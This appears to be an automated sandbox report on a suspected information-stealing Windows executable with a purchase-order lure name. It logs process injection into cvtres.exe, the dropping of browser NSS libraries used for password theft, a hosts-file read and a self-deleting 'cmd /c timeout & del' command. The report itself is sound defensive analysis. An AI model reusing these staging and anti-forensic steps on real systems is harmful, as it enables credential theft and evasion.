Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.249943507.0000000002A20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250017076.0000000002A64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250000841.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.251914030.0000000004A80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBROTHERS.dll2 vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe	Binary or memory string: OriginalFilenameNMCVXCXMXKJDFGDJKJDF.exeJ vs NUEVA ORDEN-MATSA 10-2022,.exe

PE / OLE file has an invalid certificate

Source: NUEVA ORDEN-MATSA 10-2022,.exe

Static PE information: invalid certificate

Source: NUEVA ORDEN-MATSA 10-2022,.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NUEVA ORDEN-MATSA 10-2022,.exe

ReversingLabs: Detection: 27%

Source: NUEVA ORDEN-MATSA 10-2022,.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "cvtres.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "cvtres.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 50760375990489576525014.tmp.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NUEVA ORDEN-MATSA 10-2022,.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-77BDA8E2-697AC7AD-D0FBBBFB
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: NUEVA ORDEN-MATSA 10-2022,.exe, A/c0a43d74762739676b89f90c9ce1afd20.cs	.Net Code: c5175757267e421e06d6570ba39442962 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.NUEVA ORDEN-MATSA 10-2022,.exe.760000.0.unpack, A/c0a43d74762739676b89f90c9ce1afd20.cs	.Net Code: c5175757267e421e06d6570ba39442962 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040D86E push 0040D89Ch; ret	1_2_0040D894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040D870 push 0040D89Ch; ret	1_2_0040D894
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_004140C0 push 004140ECh; ret	1_2_004140E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_004108C8 push 004108F4h; ret	1_2_004108EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040B0F7 push 0040B124h; ret	1_2_0040B11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040B0F8 push 0040B124h; ret	1_2_0040B11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00408080 push 004080B8h; ret	1_2_004080B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00408158 push 00408196h; ret	1_2_0040818E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00408970 push 004089E4h; ret	1_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00408994 push 004089E4h; ret	1_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_004089AC push 004089E4h; ret	1_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00415208 push 0041528Ch; ret	1_2_00415284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040CA0C push 0040CA3Ch; ret	1_2_0040CA34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040CA10 push 0040CA3Ch; ret	1_2_0040CA34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00417AEC push 00417B18h; ret	1_2_00417B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00404BC0 push 00404C11h; ret	1_2_00404C09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040D3C0 push 0040D3ECh; ret	1_2_0040D3E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040A3E4 push 0040A410h; ret	1_2_0040A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040C390 push 0040C3C0h; ret	1_2_0040C3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040C394 push 0040C3C0h; ret	1_2_0040C3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040A3AC push 0040A3D8h; ret	1_2_0040A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040DC44 push 0040DCA3h; ret	1_2_0040DC9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040DC0C push 0040DC38h; ret	1_2_0040DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040B41E push 0040B44Ch; ret	1_2_0040B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040B420 push 0040B44Ch; ret	1_2_0040B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0040A438 push 0040A464h; ret	1_2_0040A45C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0041A4F4 push 0041A51Ah; ret	1_2_0041A512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00414C80 push 00414CACh; ret	1_2_00414CA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00409488 push 004094B8h; ret	1_2_004094B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_0041A4AC push 0041A4E8h; ret	1_2_0041A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: 1_2_00418CB8 push 00418CE8h; ret	1_2_00418CE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\ucrtbase.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nssdbm3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\softokn3.dll	Jump to dropped file
